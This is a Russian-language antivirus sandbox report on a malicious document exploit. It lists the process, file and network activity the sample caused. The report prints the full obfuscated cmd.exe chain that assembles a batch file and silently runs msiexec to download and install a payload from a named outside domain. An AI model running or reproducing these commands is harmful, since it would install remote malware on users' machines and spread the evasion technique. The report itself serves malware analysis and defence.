Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\elena.bat&EcHo|s^et /p="c " >>%temp%\elena.bat&EcHo|s^et /p="^/i" >>%temp%\elena.bat&EcHo|s^et /p=" http^:^/^/^coalcountryindustries.com/direct.php ">>%tem...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1384
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\elena.bat
- %TEMP%\1309597.cvr
Сетевая активность
Подключается к
- 'co######tryindustries.com':80
TCP
Запросы HTTP GET
- http://co######tryindustries.com/direct.php
UDP
- DNS ASK co######tryindustries.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\elena.bat&EcHo|s^et /p="c " >>%temp%\elena.bat&EcHo|s^et /p="^/i" >>%temp%\elena.bat&EcHo|s^et /p=" http^:^/^/^coalcountryindustries.com/direct.php ">>%tem...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\elena.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\elena.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\elena.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^coalcountryindustries.com/direct.php " 1>>%TEMP%\elena.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\elena.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://coalcountryindustries.com/direct.php /q
